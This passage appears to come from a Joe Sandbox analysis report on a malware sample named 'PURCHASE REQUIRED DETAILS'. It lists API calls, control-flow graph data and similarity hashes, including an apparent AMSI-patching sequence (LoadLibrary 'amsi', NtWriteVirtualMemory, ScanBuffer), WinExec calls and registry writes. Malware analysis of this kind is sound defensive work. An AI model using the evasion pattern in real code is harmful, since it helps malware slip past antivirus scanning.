13185->13196 13198 2b118fd-2b11936 13186->13198 13204 2b118ed-2b118f7 13186->13204 13189->13169 13190->13182 13191->13198 13192->13198 13194->13193 13195->13196 13196->13198
APIs
• Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
• Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
• Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
• Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
• Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
• Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
• Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
• Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77

Control-flow Graph

control_flow_graph 13227 2b11a8c-2b11a9b 13228 2b11aa1-2b11aa5 13227->13228 13229 2b11b6c-2b11b6f 13227->13229 13232 2b11aa7-2b11aae 13228->13232 13233 2b11b08-2b11b11 13228->13233 13230 2b11b75-2b11b7f 13229->13230 13231 2b11c5c-2b11c60 13229->13231 13235 2b11b81-2b11b8d 13230->13235 13236 2b11b3c-2b11b49 13230->13236 13239 2b11c66-2b11c6b 13231->13239 13240 2b116e8-2b1170b call 2b11644 VirtualFree 13231->13240 13237 2b11ab0-2b11abb 13232->13237 13238 2b11adc-2b11ade 13232->13238 13233->13232 13234 2b11b13-2b11b27 Sleep 13233->13234 13234->13232 13241 2b11b2d-2b11b38 Sleep 13234->13241 13243 2b11bc4-2b11bd2 13235->13243 13244 2b11b8f-2b11b92 13235->13244 13236->13235 13242 2b11b4b-2b11b5f Sleep 13236->13242 13245 2b11ac4-2b11ad9 13237->13245 13246 2b11abd-2b11ac2 13237->13246 13247 2b11ae0-2b11af1 13238->13247 13248 2b11af3 13238->13248 13258 2b11716 13240->13258 13259 2b1170d-2b11714 13240->13259 13241->13233 13242->13235 13252 2b11b61-2b11b68 Sleep 13242->13252 13250 2b11bd4-2b11bd9 call 2b114c0 13243->13250 13251 2b11b96-2b11b9a 13243->13251 13244->13251 13247->13248 13253 2b11af6-2b11b03 13247->13253 13248->13253 13250->13251 13256 2b11bdc-2b11be9 13251->13256 13257 2b11b9c-2b11ba2 13251->13257 13252->13236 13253->13230 13256->13257 13262 2b11beb-2b11bf2 call 2b114c0 13256->13262 13263 2b11bf4-2b11bfe 13257->13263 13264 2b11ba4-2b11bc2 call 2b11500 13257->13264 13260 2b11719-2b11723 13258->13260 13259->13260 13262->13257 13266 2b11c00-2b11c28 VirtualFree 13263->13266 13267 2b11c2c-2b11c59 call 2b11560 13263->13267
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
• Instruction ID: ff043b244d0d6a75d583dfe07d5e3ff072b404c752661627741e3c0732ec4baa
• Opcode Fuzzy Hash: 2a8360d36b169dacd013ff447331c43ffa879f9cd7675f189318f26dcddb4d92
• Instruction Fuzzy Hash: B351EE71A212408FDB15CF6CCA84766BBE0EF4A314F9885EED648CB2C2E774C445CBA1

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
• Instruction ID: 76d3459666785fb69980c82cbbb91271009e13b4435a24c9db67cefb44b155cd
• Opcode Fuzzy Hash: 5495862f0f1bddf8e3835711096b5d896cf7844ecb1634bece4bf00fd7b1ad99
• Instruction Fuzzy Hash: FC413B75B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55
APIs
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
• WinExec.KERNEL32(?,?), ref: 02B28624
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: de4c438d1842c0d53df6f004f92959f147baa97e82033299aa8200b803261e8c
• Instruction ID: 474f45942380282da43f5fc0f3f10ac7b2e9ad0c667e0a98645b595e1c511140
APIs
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
• WinExec.KERNEL32(?,?), ref: 02B28624
Strings
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
• Opcode ID: d0e22067127069d00553c8d87b508e1811c51134550d7c6342ed30fb074124b7
• Instruction ID: 78092c23edb0741e8d385a2d3ff20ef1e16d16e6999086907ed04610de41314e
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
• GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6
  • Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA
  • Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7
• GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B
  • Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CreateErrorFileLast$FormatFullMessageNamePath
• String ID:
• API String ID: 503785936-0
• Opcode ID: baf3ed8c469578cbf0b5a3d49de77a98abf575e316f9e33ab2595bd9827d2b35
• Instruction ID: 1e8b4b0daa47cb5162ecb49c8fec66eaa457c7880b1a38e29eadc896d460feef
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
• RegSetValueExA.ADVAPI32(00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
• RegCloseKey.ADVAPI32(00000914,00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
• Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
• RegSetValueExA.ADVAPI32(00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
• RegCloseKey.ADVAPI32(00000914,00000914,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: CloseOpenValue
• String ID:
• API String ID: 779948276-0
• Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
• Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                                                                          • Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                                                                                                          • Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B14D6D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 986138563-0
                                                                                                                                                                                                                          • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                          • Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02B273DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                          • API String ID: 3341692771-2852464175
                                                                                                                                                                                                                          • Opcode ID: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                                                                                                          • Instruction ID: ffe24a56b4168493fdef9377ecc37c51d95c0c553f498a8a1f70b13c89e80fff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944f5d6bc4815127c9b9f3be5b6a46648a0525cd707318ae2bc5a12718da4cbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB1E474A017189FDB14CF99D580A9DFBF2FF89314F2481A9E849AB360DB30A849DF54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781
                                                                                                                                                                                                                            • Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                                                                                                          • Opcode ID: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                                                                                                          • Instruction ID: 31705c05396b3093132a35808ecb0407729877560101d150f040d0c1827d8464
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C111C8307102108BE735AF29C8C8A6677DBEF8575079084E6ED4B8F215DB30EC41DB62
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                                                                                                          • Opcode ID: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                                                                                                                          • Instruction ID: aac2e1a7479b28b3d4be163968fb7e115db2a87ac9fdc6a70b521e5dc32b1f5b
• Opcode Fuzzy Hash: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
• Instruction Fuzzy Hash: 38317171A00209AFDB14DFA8D886AAE77F8EB0C304F8844E5FD09D7250D734EA50CBA5

APIs
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
  • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
  • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
  • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
  • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
• FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
Memory Dump Source
• Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
• Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
Similarity
• API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
• String ID:
• API String ID: 1478290883-0
• Opcode ID: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
• Instruction ID: 401c5546b03e7ac287ec388b66642f19348bdca534cc7cf9fffcb5614c4529ea
• Opcode Fuzzy Hash: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
• Instruction Fuzzy Hash: C02157F0694310AFEB00F7B4DD02B9DB7EADB05740F9044E0F608E7190DE749905AA1D
